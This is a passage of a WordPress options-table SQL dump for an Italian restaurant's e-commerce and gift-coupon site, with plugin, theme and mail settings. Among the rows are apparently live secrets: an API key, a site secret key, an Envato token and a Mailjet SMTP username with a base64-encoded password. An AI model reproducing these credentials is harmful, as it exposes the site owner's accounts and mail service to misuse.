PayPal.\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";s:23:\"sandbox_api_certificate\";s:0:\"\";s:19:\"sandbox_api_subject\";s:0:\"\";s:5:\"debug\";s:2:\"no\";s:14:\"invoice_prefix\";s:10:\"ecommerce-\";s:15:\"require_billing\";s:2:\"no\";s:13:\"paymentaction\";s:4:\"sale\";s:16:\"instant_payments\";s:2:\"no\";s:14:\"logo_image_url\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png\";s:26:\"subtotal_mismatch_behavior\";s:3:\"add\";s:22:\"credit_message_enabled\";s:2:\"no\";s:37:\"single_product_credit_message_enabled\";s:2:\"no\";s:27:\"mark_credit_message_enabled\";s:2:\"no\";}','yes'),(10203,'woo_pp_admin_error','a:1:{i:0;a:1:{s:7:\"success\";s:59:\"Success!  Your PayPal account has been set up successfully.\";}}','yes'),(10213,'_transient_orders-transient-version','1608822337','yes'),(10224,'direct_checkout_enabled','1','yes'),(10225,'direct_checkout_cart_button_text','Acquista / Prenota','yes'),(10343,'theme_mods_sydney-child02','a:26:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:17:\"front_header_type\";s:6:\"slider\";s:16:\"site_header_type\";s:5:\"image\";s:14:\"slider_image_1\";s:79:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/serata-1920x1275.jpg\";s:14:\"slider_title_1\";s:0:\"\";s:17:\"slider_subtitle_1\";s:0:\"\";s:14:\"slider_image_2\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1922-1920x1275.jpg\";s:14:\"slider_title_2\";s:0:\"\";s:17:\"slider_subtitle_2\";s:0:\"\";s:14:\"slider_image_3\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1608-1920x1275.jpg\";s:12:\"slider_speed\";i:8000;s:16:\"textslider_slide\";i:1;s:12:\"header_image\";s:80:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:197;s:3:\"url\";s:80:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg\";s:13:\"thumbnail_url\";s:80:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg\";s:6:\"height\";i:600;s:5:\"width\";i:1920;}s:10:\"menu_style\";s:8:\"centered\";s:16:\"site_title_color\";s:7:\"#d65050\";s:19:\"submenu_items_color\";s:7:\"#ffffff\";s:9:\"site_logo\";s:81:\"http://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png\";s:13:\"primary_color\";s:7:\"#ff9999\";s:15:\"top_items_color\";s:7:\"#ffffff\";s:13:\"sidebar_color\";s:7:\"#767676\";s:12:\"rows_overlay\";s:7:\"#666666\";s:19:\"footer_widget_areas\";s:1:\"3\";s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1544632377;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:21:\"sydney_contact_info-2\";}s:9:\"sidebar-1\";a:6:{i:0;s:14:\"recent-posts-2\";i:1;s:6:\"text-3\";i:2;s:6:\"text-7\";i:3;s:6:\"text-5\";i:4;s:6:\"text-4\";i:5;s:6:\"text-6\";}s:8:\"footer-1\";a:1:{i:0;s:6:\"text-2\";}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}}}}','yes'),(11212,'woocommerce_new_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:30:\"notifiche@ristorantesolymar.it\";s:7:\"subject\";s:76:\"[{site_title}] Prenotazione da nuovo cliente ({order_number}) - {order_date}\";s:7:\"heading\";s:26:\"Nuova prenotazione cliente\";s:10:\"email_type\";s:4:\"html\";}','yes'),(11214,'woocommerce_cancelled_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:30:\"notifiche@ristorantesolymar.it\";s:7:\"subject\";s:55:\"[{site_title}] Prenotazione cancellata ({order_number})\";s:7:\"heading\";s:17:\"Ordine cancellato\";s:10:\"email_type\";s:4:\"html\";}','yes'),(11216,'woocommerce_failed_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:30:\"notifiche@ristorantesolymar.it\";s:7:\"subject\";s:46:\"[{site_title}] Ordine fallito ({order_number})\";s:7:\"heading\";s:14:\"Ordine fallito\";s:10:\"email_type\";s:4:\"html\";}','yes'),(11652,'WS_settings','1.1.1','yes'),(12440,'woocommerce_gift_coupon_logo','http://www.ristorantesolymar.it/wp-content/uploads/2016/12/sol-y-mar-logo-150.png','yes'),(12441,'woocommerce_gift_coupon_show_logo','1','yes'),(12442,'woocommerce_gift_coupon_send','1','yes'),(12443,'woocommerce_gift_coupon_info_paragraph','Presentati al ristorante Sol Y Mar di Riccione con questo coupon per pranzo/cena che ti è stato offerto.','yes'),(12444,'woocommerce_gift_coupon_info_footer','','yes'),(12445,'woocommerce_gift_coupon_title_h','Buono regalo per una cena','yes'),(12446,'woocommerce_gift_coupon_subject','Buono Regalo per te - Ristorante Sol Y Mar','yes'),(12447,'woocommerce_gift_coupon_bg_color_header','','yes'),(12448,'woocommerce_gift_coupon_bg_color_footer','','yes'),(12449,'woocommerce_gift_coupon_bg_color_title','','yes'),(12450,'wpseo_taxonomy_meta','a:1:{s:11:\"product_cat\";a:2:{i:10;a:2:{s:13:\"wpseo_linkdex\";s:2:\"20\";s:19:\"wpseo_content_score\";s:2:\"30\";}i:23;a:3:{s:11:\"wpseo_title\";s:60:\"Acquista e Regala una cena al Sol Y Mar - Coupon idee regalo\";s:13:\"wpseo_linkdex\";s:1:\"7\";s:19:\"wpseo_content_score\";s:2:\"60\";}}}','yes'),(14459,'fresh_site','0','yes'),(14597,'iubenda_cookie_law_solution','a:8:{s:12:\"code_default\";s:1141:\"<style type=\"text/css\"> #iubenda-cs-banner { bottom: 0px !important; left: 0px !important; position: fixed !important; width: 100% !important; z-index: 99999998 !important; background-color: black; } .iubenda-cs-content { display: block; margin: 0 auto; padding: 20px; width: auto; font-family: Helvetica,Arial,FreeSans,sans-serif; font-size: 14px; background: #000; color: #fff;} .iubenda-cs-rationale { max-width: 900px; position: relative; margin: 0 auto; } .iubenda-banner-content &gt; p { font-family: Helvetica,Arial,FreeSans,sans-serif; line-height: 1.5; } .iubenda-cs-close-btn { margin:0; color: #fff; text-decoration: none; font-size: 14px; position: absolute; top: 0; right: 0; border: none; } .iubenda-cs-cookie-policy-lnk { text-decoration: underline; color: #fff; font-size: 14px; font-weight: 900; } </style> <script type=\"text/javascript\"> var _iub = _iub || []; _iub.csConfiguration = {\"lang\":\"it\",\"siteId\":464823,\"banner\":{\"slideDown\":false,\"applyStyles\":false},\"cookiePolicyId\":7761758}; </script><script type=\"text/javascript\" src=\"//cdn.iubenda.com/cookie_solution/safemode/iubenda_cs.js\" charset=\"UTF-8\" async></script>\";s:5:\"parse\";b:1;s:13:\"parser_engine\";s:3:\"new\";s:12:\"skip_parsing\";b:1;s:5:\"ctype\";b:1;s:11:\"output_feed\";b:1;s:13:\"menu_position\";s:7:\"topmenu\";s:12:\"deactivation\";b:0;}','no'),(14598,'iubenda_cookie_law_version','1.14.1','no'),(14675,'pps_options','a:41:{s:11:\"popup_style\";s:5:\"light\";s:10:\"bg_content\";s:7:\"#FFFFFF\";s:12:\"border_popup\";s:1:\"8\";s:13:\"border_radius\";s:1:\"5\";s:11:\"popup_width\";s:3:\"640\";s:12:\"popup_height\";s:0:\"\";s:11:\"auto_height\";s:4:\"true\";s:10:\"show_title\";s:5:\"false\";s:10:\"bg_overlay\";s:7:\"#000000\";s:15:\"opacity_overlay\";s:4:\"0.75\";s:13:\"position_type\";s:8:\"absolute\";s:10:\"position_x\";s:4:\"auto\";s:10:\"position_y\";s:4:\"auto\";s:11:\"popup_speed\";s:3:\"300\";s:12:\"popup_zindex\";s:5:\"99999\";s:13:\"close_overlay\";s:4:\"true\";s:13:\"close_esc_key\";s:4:\"true\";s:16:\"popup_transition\";s:6:\"fadeIn\";s:12:\"popup_easing\";s:5:\"swing\";s:11:\"button_text\";s:10:\"Open Popup\";s:12:\"button_title\";s:24:\"Click here to open Popup\";s:12:\"button_class\";s:16:\"pps-button-popup\";s:16:\"img_width_button\";s:3:\"160\";s:11:\"slider_auto\";s:5:\"false\";s:22:\"slider_animation_speed\";s:3:\"600\";s:14:\"slider_timeout\";s:4:\"6000\";s:17:\"slider_pagination\";s:4:\"true\";s:13:\"slider_arrows\";s:4:\"true\";s:12:\"slider_pause\";s:4:\"true\";s:15:\"where_open_link\";s:6:\"_blank\";s:19:\"disable_logged_user\";s:5:\"false\";s:14:\"prevent_mobile\";s:5:\"false\";s:15:\"prevent_desktop\";s:5:\"false\";s:11:\"embed_width\";s:3:\"100\";s:16:\"emded_width_unit\";s:1:\"%\";s:12:\"embed_height\";s:3:\"460\";s:10:\"custom_css\";s:122:\".pps-popup {\r\n}\r\n.pps-popup .pps-wrap {\r\n}\r\n.pps-popup .pps-wrap .pps-close {\r\n}\r\n.pps-popup .pps-wrap .pps-content {\r\n}\r\n\";s:9:\"custom_js\";s:254:\"jQuery(document).ready(function($) {\r\n  $(\".pps-popup\").on(\"ppsOnOpen\", function(e){\r\n    //Do something when you open any popups\r\n  });\r\n\r\n  $(\"#popuppress-5\").on(\"ppsOnClose\", function(e){\r\n    //Do something when you close the popup id = 5\r\n  });\r\n});\";s:13:\"use_wp_editor\";s:4:\"true\";s:10:\"fix_jquery\";s:4:\"true\";s:15:\"default_options\";s:5:\"false\";}','yes'),(14676,'pps_compatibility_option','1','yes'),(14855,'widget_sydney_portfolio','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(17800,'toolset_bs_component_show_buttons_cm_status','no','yes'),(17807,'woocommerce_meta_box_errors','a:0:{}','yes'),(18423,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18424,'akismet_spam_count','1788','yes'),(18427,'wordpress_api_key','3232697ae6c1','yes'),(18428,'akismet_strictness','1','yes'),(18429,'akismet_show_user_comments_approved','1','yes'),(20592,'woocommerce_shipping_debug_mode','no','no'),(20604,'_transient_woocommerce_cache_excluded_uris','a:6:{i:0;s:5:\"p=208\";i:1;s:10:\"/carrello/\";i:2;s:5:\"p=209\";i:3;s:10:\"/checkout/\";i:4;s:5:\"p=210\";i:5;s:13:\"/mio-account/\";}','yes'),(26891,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(26892,'widget_media_image','a:4:{i:2;a:15:{s:13:\"attachment_id\";i:309;s:3:\"url\";s:75:\"http://attika.mikado-themes.com/wp-content/uploads/2018/08/footer-img-1.png\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"width\";i:119;s:6:\"height\";i:119;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"x\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:1:\"#\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:3;a:15:{s:13:\"attachment_id\";i:688;s:3:\"url\";s:67:\"http://attika.mikado-themes.com/wp-content/uploads/2018/08/logo.png\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:6:\"custom\";s:5:\"width\";i:57;s:6:\"height\";i:57;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"m\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:31:\"http://attika.mikado-themes.com\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:4;a:15:{s:13:\"attachment_id\";i:688;s:3:\"url\";s:67:\"http://attika.mikado-themes.com/wp-content/uploads/2018/08/logo.png\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:6:\"custom\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"m\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:31:\"http://attika.mikado-themes.com\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(26893,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(26897,'woocommerce_enable_reviews','yes','yes'),(27285,'mwb_wgm_giftcardtemplatepage','1','yes'),(27289,'mwb_wgm_add_schedule','1','yes'),(27291,'mwb_wgm_valentinetemplate','1','yes'),(27295,'mwb_wgm_general_setting_enable_selected_format_1','d/m/Y','yes'),(27296,'mwb_wgm_general_setting_enable_selected_format','dd/mm/yy','yes'),(27297,'mwb_wgm_general_setting_shop_page_enable','on','yes'),(27298,'mwb_wgm_general_setting_giftcard_coupon_length','5','yes'),(27299,'mwb_wgm_general_setting_giftcard_prefix','solymarcoupon','yes'),(27300,'mwb_wgm_general_setting_giftcard_expiry','180','yes'),(27301,'mwb_wgm_general_setting_giftcard_use','1','yes'),(27302,'mwb_wgm_general_setting_tax_cal_enable','off','yes'),(27303,'mwb_wgm_general_setting_giftcard_individual_use','no','yes'),(27304,'mwb_wgm_general_setting_giftcard_freeshipping','yes','yes'),(27305,'mwb_wgm_general_setting_giftcard_applybeforetx','no','yes'),(27306,'mwb_wgm_general_setting_enable_selected_date','off','yes'),(27307,'mwb_wgm_general_setting_categ_enable','off','yes'),(27311,'mwb_wgm_other_setting_giftcard_message_length','300','yes'),(27312,'mwb_wgm_other_setting_giftcard_subject','[SITENAME]','yes'),(27313,'mwb_wgm_other_setting_receive_subject','Un buono regale per te - Sol Y Mar','yes'),(27314,'mwb_wgm_other_setting_giftcard_subject_downloadable','[SITENAME]','yes'),(27315,'mwb_wgm_other_setting_giftcard_subject_shipping','','yes'),(27316,'mwb_wgm_other_setting_receive_coupon_subject','Buono Regalo - [SITENAME]','yes'),(27317,'mwb_wgm_other_setting_receive_coupon_message',' \r\n<table style=\\\"max-width: 600px; background-color: #0467a2;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" align=\\\"center\\\">\r\n<tbody>\r\n<tr>\r\n<td style=\\\"padding: 20px 0; text-align: center;\\\">\r\n<p style=\\\"font-size: 20px; color: #fff; font-family: sans-serif; text-align: center;\\\">[SITENAME]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\\\"max-width: 600px;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" align=\\\"center\\\">\r\n<tbody>\r\n<tr>\r\n<td style=\\\"padding: 40px 10px; width: 100%; font-size: 12px; font-family: sans-serif; mso-height-rule: exactly; line-height: 18px; text-align: center; color: #888888;\\\">\r\n<p style=\\\"font-size: 18px; color: #575757; text-align: center; font-family: sans-serif;\\\">Ciao, questa è una notifica del tuo acquisto del coupon sul sito Sol Y Mar. Il buono acquistato è di [COUPONAMOUNT]</p>\r\n<span style=\\\"font-size: 16px; color: #575757; text-align: center; font-family: sans-serif;\\\">Grazie</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- Email Header : END -->\r\n<!-- Email Footer : BEGIN -->\r\n<table style=\\\"max-width: 600px; background-color: #fcd347;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" align=\\\"center\\\">\r\n<tbody>\r\n<tr>\r\n<td style=\\\"padding: 10px 10px; width: 100%; font-size: 12px; font-family: sans-serif; mso-height-rule: exactly; line-height: 18px; text-align: center; color: #888888;\\\">\r\n<p style=\\\"font-size: 14px; font-family: sans-serif; color: #fff; text-align: center;\\\">[DISCLAIMER]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n ','yes'),(27318,'mwb_wgm_other_setting_browse','on','yes'),(27319,'mwb_wgm_addition_bcc_option_enable','on','yes'),(27320,'mwb_wgm_additional_sendtoday_disable','on','yes'),(27321,'mwb_wgm_additional_apply_coupon_disable','off','yes'),(27322,'mwb_wgm_additional_resend_disable','off','yes'),(27323,'mwb_wgm_additional_preview_disable','off','yes'),(27324,'mwb_wgm_qrcode_enable','barcode','yes'),(27325,'mwb_wgm_qrcode_ecc_level','L','yes'),(27326,'mwb_wgm_qrcode_size','3','yes'),(27327,'mwb_wgm_qrcode_margin','4','yes'),(27328,'mwb_wgm_barcode_codetype','code39','yes'),(27329,'mwb_wgm_barcode_size','40','yes'),(27330,'mwb_wgm_barcode_display_enable','on','yes'),(27331,'mwb_wgm_send_giftcard','customer_choose','yes'),(27332,'mwb_wgm_email_to_recipient','on','yes'),(27333,'mwb_wgm_downloadable','on','yes'),(27334,'mwb_wgm_general_cart_shipping_enable','off','yes'),(27335,'mwb_wgm_customer_selection','a:3:{s:18:\"Email_to_recipient\";i:1;s:12:\"Downloadable\";i:1;s:8:\"Shipping\";i:0;}','yes'),(27336,'mwb_wgm_three_new_template','1','yes'),(27337,'mwb_wgm_newtemplate','1','yes'),(27351,'mwb_wgm_other_setting_upload_logo','http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png','yes'),(27352,'mwb_wgm_other_setting_logo_height','150','yes'),(27353,'mwb_wgm_other_setting_logo_width','200','yes'),(27354,'mwb_wgm_other_setting_background_logo','http://www.ristorantesolymar.it/wp-content/uploads/2017/07/do-small-thing.png','yes'),(27419,'mwb_wgm_other_setting_disclaimer','Trovi il regolamento dell\\\'utilizzo dei Coupon / Buoni regali sul <a href=\\\"https://www.ristorantesolymar.it/info-privacy/\\\">sito</a>','yes'),(27420,'mwb_wgm_other_setting_receive_message','Il coupon che hai acquistato è stato inviato via email all\\\'indirizzo destinatario che hai specificato durante l\\\'ordine.','yes'),(27421,'mwb_wgm_addition_pdf_enable','on','yes'),(27422,'mwb_wgm_new_pdf_support_templates','1','yes'),(27492,'mwb_wgm_other_setting_background_color','#ffffff','yes'),(27565,'_transient_shipping-transient-version','1499817173','yes'),(30120,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(41584,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(41599,'woocommerce_store_address','Sol y Mar / NoSmoke','yes'),(41600,'woocommerce_store_address_2','Lungomare Riccione','yes'),(41601,'woocommerce_store_city','Riccione','yes'),(41602,'woocommerce_store_postcode','','yes'),(41835,'sib_language_notice_option','','yes'),(41849,'rlrsssl_options','a:15:{s:12:\"site_has_ssl\";b:1;s:4:\"hsts\";b:0;s:22:\"htaccess_warning_shown\";b:0;s:19:\"review_notice_shown\";b:1;s:25:\"ssl_success_message_shown\";b:1;s:26:\"autoreplace_insecure_links\";b:1;s:17:\"plugin_db_version\";s:6:\"4.0.14\";s:20:\"do_not_edit_htaccess\";b:0;s:17:\"htaccess_redirect\";b:0;s:11:\"ssl_enabled\";b:1;s:19:\"javascript_redirect\";b:0;s:11:\"wp_redirect\";b:1;s:31:\"switch_mixed_content_fixer_hook\";b:0;s:19:\"dismiss_all_notices\";b:0;s:21:\"dismiss_review_notice\";b:0;}','yes'),(46264,'_site_transient_sydney-welcome','forever','no'),(46271,'widget_cleantalk_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(46272,'cleantalk_data','a:14:{s:13:\"start_version\";s:4:\"5.85\";s:10:\"user_token\";s:0:\"\";s:7:\"js_keys\";a:1:{i:2105349483;i:1516960496;}s:18:\"js_keys_store_days\";i:14;s:15:\"js_key_lifetime\";i:86400;s:11:\"sfw_counter\";a:2:{s:3:\"all\";i:0;s:7:\"blocked\";i:0;}s:14:\"array_accepted\";a:0:{}s:13:\"array_blocked\";a:0:{}s:12:\"current_hour\";s:0:\"\";s:16:\"all_time_counter\";a:2:{s:8:\"accepted\";i:0;s:7:\"blocked\";i:0;}s:12:\"user_counter\";a:3:{s:8:\"accepted\";i:0;s:7:\"blocked\";i:0;s:5:\"since\";s:6:\"26 Jan\";}s:18:\"connection_reports\";a:4:{s:7:\"success\";i:0;s:8:\"negative\";i:0;s:15:\"negative_report\";a:0:{}s:5:\"since\";s:6:\"26 Jan\";}s:14:\"plugin_version\";s:4:\"5.85\";s:8:\"timezone\";i:-60;}','yes'),(46273,'cleantalk_server','a:3:{s:11:\"ct_work_url\";s:22:\"http://159.203.121.181\";s:13:\"ct_server_ttl\";i:8045;s:17:\"ct_server_changed\";i:1516960447;}','yes'),(46275,'secret_key','&q#eyI wz y[biryGn%A,g<q75lkd*f=R|]V2.Ae*17)$NSfAD{Pc=nHg*(i&Xzw','no'),(47691,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:8:\"prodotto\";s:13:\"category_base\";s:18:\"categoria-prodotto\";s:8:\"tag_base\";s:12:\"tag-prodotto\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:0;}','yes'),(47692,'current_theme_supports_woocommerce','yes','yes'),(47697,'default_product_cat','27','yes'),(49532,'woocommerce_thumbnail_image_width','300','yes'),(49533,'woocommerce_thumbnail_cropping','custom','yes'),(49534,'woocommerce_single_image_width','600','yes'),(49538,'woocommerce_queue_flush_rewrite_rules','no','yes'),(51112,'ai1wm_updater','a:0:{}','yes'),(56745,'woocommerce_erasure_request_removes_order_data','no','no'),(56746,'woocommerce_erasure_request_removes_download_data','no','no'),(56747,'wp_page_for_privacy_policy','172','yes'),(56748,'woocommerce_registration_privacy_policy_text','I dati personali che inserirai verranno utilizzati esclusivamente per le finalità del sito, per l\'acquisto di cene, per la gestione del tuo account. Maggiori informazioni e richieste di rimozione nella nostra [privacy_policy].','yes'),(56749,'woocommerce_checkout_privacy_policy_text','I dati personali che inserirai verranno utilizzati esclusivamente per le finalità del sito, per l\'acquisto di cene, per la gestione del tuo account. Maggiori informazioni e richieste di rimozione nella nostra [privacy_policy].','yes'),(56750,'woocommerce_delete_inactive_accounts','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(56751,'woocommerce_trash_pending_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(56752,'woocommerce_trash_failed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(56753,'woocommerce_trash_cancelled_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(56754,'woocommerce_anonymize_completed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(56755,'woocommerce_checkout_highlight_required_fields','yes','yes'),(64159,'envato_market_version','2.0.0','yes'),(64160,'envato_market','a:4:{s:5:\"token\";s:32:\"oiDn9nWtSB2f3oF9hnOhxvpSrlrfrM7z\";s:17:\"installed_version\";s:5:\"2.0.1\";s:16:\"is_plugin_active\";s:1:\"1\";s:7:\"notices\";a:1:{s:10:\"http_error\";s:59:\"cURL error 28: Resolving timed out after 10000 milliseconds\";}}','yes'),(64161,'envato_market_installed_version','2.0.0','yes'),(64162,'envato_market_state','activated','yes'),(64175,'mwb_wgm_activation_date_time','1532379868','yes'),(64176,'mwb_wgm_other_setting_mail_style','','yes'),(64183,'mb_admin_notice','a:1:{s:15:\"two_week_review\";a:3:{s:5:\"start\";s:10:\"07/30/2018\";s:3:\"int\";i:7;s:9:\"dismissed\";i:0;}}','yes'),(64184,'mail-bank-version-number','3.0.5','yes'),(64187,'mail-bank-admin-email','webmaster@baldisserri.com','yes'),(64189,'update_email_configuration','a:22:{s:13:\"email_address\";s:34:\"notifiche@www.ristorantesolymar.it\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"headers\";s:0:\"\";s:11:\"mailer_type\";s:4:\"smtp\";s:15:\"mailgun_api_key\";s:0:\"\";s:19:\"mailgun_domain_name\";s:0:\"\";s:25:\"sender_name_configuration\";s:8:\"override\";s:11:\"sender_name\";s:32:\"Sol Y Mar, ristorante a Riccione\";s:24:\"from_email_configuration\";s:8:\"override\";s:12:\"sender_email\";s:34:\"notifiche@www.ristorantesolymar.it\";s:8:\"hostname\";s:17:\"in-v3.mailjet.com\";s:4:\"port\";i:25;s:8:\"enc_type\";s:4:\"none\";s:9:\"auth_type\";s:5:\"login\";s:9:\"client_id\";s:0:\"\";s:13:\"client_secret\";s:0:\"\";s:8:\"username\";s:32:\"8a6cd27d27a3d3e4aa080185d0a1edc0\";s:14:\"automatic_mail\";s:1:\"1\";s:8:\"password\";s:44:\"ZWEzNDkxN2ZhYzE4MmQ3OWUzMTFlYjgyOTNiMWE2YWE=\";s:12:\"redirect_uri\";s:55:\"http://www.ristorantesolymar.it/wp-admin/admin-ajax.php\";}','yes'),(64193,'mb_tech_banker_site_id','98274','yes'),(64201,'mailjet_test_address','webmaster@baldisserri.com','yes'),(64202,'mailjet_from_email','notifiche@ristorantesolymar.it','yes'),(64203,'mailjet_from_name','Ristorante Sol Y Mar - Riccione','yes'),(64205,'mailjet_enabled','1','yes'),(64206,'mailjet_token93.44.87.4','{\"timestamp\":0}','yes'),(64207,'mailjet_test','1','yes'),(64208,'mailjet_ssl','','yes'),(64209,'mailjet_port','25','yes'),(64217,'widget_wp_mailjet_subscribe_widget','a:2:{i:2;a:10:{s:5:\"en_US\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:7:\"English\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"fr_FR\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"S